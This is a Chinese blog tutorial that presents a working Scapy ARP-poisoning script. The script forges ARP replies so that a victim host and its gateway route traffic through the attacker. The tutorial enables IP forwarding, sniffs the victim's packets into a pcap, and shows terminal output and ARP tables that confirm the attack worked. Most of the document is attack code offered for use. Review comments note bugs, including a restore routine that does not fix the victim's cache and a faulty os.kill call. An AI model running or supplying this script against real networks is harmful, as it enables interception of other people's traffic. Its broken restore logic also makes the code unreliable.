Scapy之ARP投毒

直接上实例,具体意思我都在源码上备注了

#-*-coding:utf-8-*-
from scapy.all import *
import os
import sys
import threading
import string
import signal
# Local interface used both for the ARP traffic and for sniffing
# (the name "interact" is kept as in the original).
interact = "eth0"
# IP of the client whose ARP cache is targeted.
target_ip = "192.168.2.245"
# IP of the gateway whose identity is impersonated.
gatway_ip = "192.168.2.254"
# How many packets sniff() collects before the capture is written out.
packet_count = 1000

# Make every scapy send()/sniff() default to this interface.
conf.iface = interact
# Verbosity 0: suppress scapy's per-send console output.
conf.verb = 0
def get_mac(ip_address):
    """Look up the MAC address that answers an ARP who-has for *ip_address*.

    The probe goes out on ``conf.iface`` via ``srp`` (2 s timeout, up to 10
    retries); the Ethernet source of the first reply is returned, or ``None``
    when nobody answered.
    """
    probe = Ether(dst="01:02:03:04:05:06") / ARP(pdst=ip_address)
    answered = srp(probe, timeout=2, retry=10)[0]
    if len(answered) == 0:
        return None
    _sent, reply = answered[0]
    return reply[Ether].src
 
def  restore_target(gatway_ip,gatway_mac,target_ip,target_mac):
    """Re-advertise the real gateway/target MAC pairs so the ARP caches recover.

    Sends five unsolicited ARP replies (op=2) per call, then tries to signal
    the running process so the sniffer stops.

    Args:
        gatway_ip:  gateway IP address.
        gatway_mac: real MAC of the gateway.
        target_ip:  client IP address.
        target_mac: real MAC of the client.
    """
    print "[*] Restoring target..."
    # Reply to the gateway: "gatway_ip is-at gatway_mac".
    send(ARP(op=2,psrc=gatway_ip,pdst=gatway_ip,hwdst="01:02:03:04:05:06",hwsrc=gatway_mac),count=5)
    # Reply to the target, but with psrc=gatway_ip and hwsrc=target_mac.
    # NOTE(review): as written, neither reply tells the target that gatway_ip
    # is at gatway_mac, so the target's cache is not actually restored here;
    # check the psrc/pdst/hwsrc triples against the intended repair.
    send(ARP(op=2,psrc=gatway_ip,pdst=target_ip,hwdst="01:02:03:04:05:06",hwsrc=target_mac),count=5)

    # NOTE(review): os.getpid is passed uncalled and os.kill takes no 'sig'
    # keyword, so this line raises TypeError instead of delivering SIGINT.
    os.kill(os.getpid,sig=signal.SIGINT)
 
 
 
def  poison_target(gatway_ip,gatway_mac,target_ip,target_mac):
    """Send forged ARP replies to the target and the gateway until interrupted.

    Two unsolicited ARP replies (op=2) are built once and re-sent every 2 s.
    hwsrc is never set on either, so scapy's default (normally the sending
    interface's own MAC) is what the peers learn.

    Args:
        gatway_ip:  gateway IP address (spoofed source toward the target).
        gatway_mac: real gateway MAC (hardware destination of the gateway-bound reply).
        target_ip:  client IP address (spoofed source toward the gateway).
        target_mac: real client MAC (hardware destination of the target-bound reply).

    Returns:
        None.  The loop has no break; it only ends when an exception escapes.
    """

    # Reply aimed at the target, claiming gatway_ip for this host.
    poison_target = ARP()
    poison_target.op =2
    poison_target.psrc = gatway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    # Reply aimed at the gateway, claiming target_ip for this host.
    poison_gatewy = ARP()
    poison_gatewy.op =2
    poison_gatewy.psrc = target_ip
    poison_gatewy.pdst = gatway_ip
    poison_gatewy.hwdst = gatway_mac    

    print "[*] Beginning the ARP poison.[CTRL-C to stop]"

    # Re-send both replies every 2 s (presumably so the poisoned entries do not
    # age out).  Detection note: ARP replies that answer no request, repeat on
    # a fixed period and re-map a gateway IP to a different MAC are exactly
    # what ARP monitoring (e.g. arpwatch, switch-side Dynamic ARP Inspection)
    # alerts on.
    while True:
        try:
            send(poison_target)
            send(poison_gatewy)

            # `time` is not imported in this file; it is only in scope if the
            # scapy star-import re-exports it -- TODO confirm.
            time.sleep(2)
        except KeyboardInterrupt:
            # NOTE(review): KeyboardInterrupt is raised in the main thread, so
            # when this function runs in the worker thread started below this
            # branch is not expected to fire; the main-thread handler restores.
            restore_target(gatway_ip, gatway_mac, target_ip, target_mac)

    # Unreachable as written: the loop above never breaks.
    print "[*] ARP poison attack finised"
    return
 
# --- main script (runs at import time; there is no __main__ guard) ---
print "[*] Setting up %s" % interact

# Resolve the gateway's real MAC first; it addresses the gateway-bound forged
# replies and is needed again to restore the caches afterwards.
gatway_mac = get_mac(gatway_ip)

if gatway_mac is None:
    # NOTE(review): this is the failure path, yet the exit status is 0.
    print "[!!!] Faile to get gatway MAC.Exiting"
    sys.exit(0)
else:
    print "[*] Gatway %s is at %s" % (gatway_ip ,gatway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    # NOTE(review): this is the failure path, yet the exit status is 0.
    print "[!!!] Faile to get target_mac MAC.Exiting"
    sys.exit(0)
else:
     print "[*] target_mac %s is at %s" % (target_ip ,target_mac)
     # Start the poisoning loop in a background (non-daemon) thread.
     poison_thread = threading.Thread(target=poison_target, args=(gatway_ip,gatway_mac,target_ip,target_mac))
     poison_thread.start()

     try:
         print "[*] Starting sniffer for %d packets" % packet_count

         # BPF filter: only IP traffic to or from the target host.
         bpf_filter = "ip host %s" % target_ip
         # sniff() blocks until packet_count matching packets have been seen
         # on the chosen interface.
         packets = sniff(count=packet_count, filter=bpf_filter,iface=interact)

         # Write the capture to a pcap file in the working directory.
         wrpcap('arper.pcap',packets)
         # Put the real gateway/target mappings back.
         restore_target(gatway_ip,gatway_mac,target_ip,target_mac)

     except KeyboardInterrupt:
         # Ctrl-C reaches the main thread: restore the caches before leaving.
         restore_target(gatway_ip,gatway_mac,target_ip,target_mac)
         exit(0)

这样我们就能欺骗客户端192.168.2.245的电脑认为我们的电脑是网关

本机开启流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward

未开启脚本之前,客户端arp -a查看

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.2.245 --- 0x2
  Internet Address      Physical Address      Type
  192.168.2.254         00-30-18-1c-4b-29     dynamic
  192.168.101.1         bc-5f-f6-a9-19-1d     dynamic

开启软件

root@myspuerkali:~/python# python arper.py
[*] Setting up eth0
[*] Gatway 192.168.2.254 is at 00:30:18:1c:4b:29
[*] target_mac 192.168.2.245 is at 00:0c:29:ca:e8:e0
[*] Beginning the ARP poison.[CTRL-C to stop]
[*] Starting sniffer for 1000 packets

再查看客户机的ARP表

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.2.245 --- 0x2
  Internet Address      Physical Address      Type
  192.168.2.88          d0-50-99-0a-e8-23     dynamic
  192.168.2.249         00-50-56-2e-a2-d1     dynamic
  192.168.2.254         00-50-56-2e-a2-d1     dynamic
  192.168.101.1         bc-5f-f6-a9-19-1d     dynamic

伪装成功,这样客户端上网的流量将会转发到我们这里

又因为我们添加了这段代码
wrpcap('arper.pcap',packets)
所以成功之后我们可以看到在脚本目录生成了一个arper.pcap文件
可以使用wireshark跟network miner等工具处理跟打开。
下篇文章将会简单介绍怎么处理pcap文件包
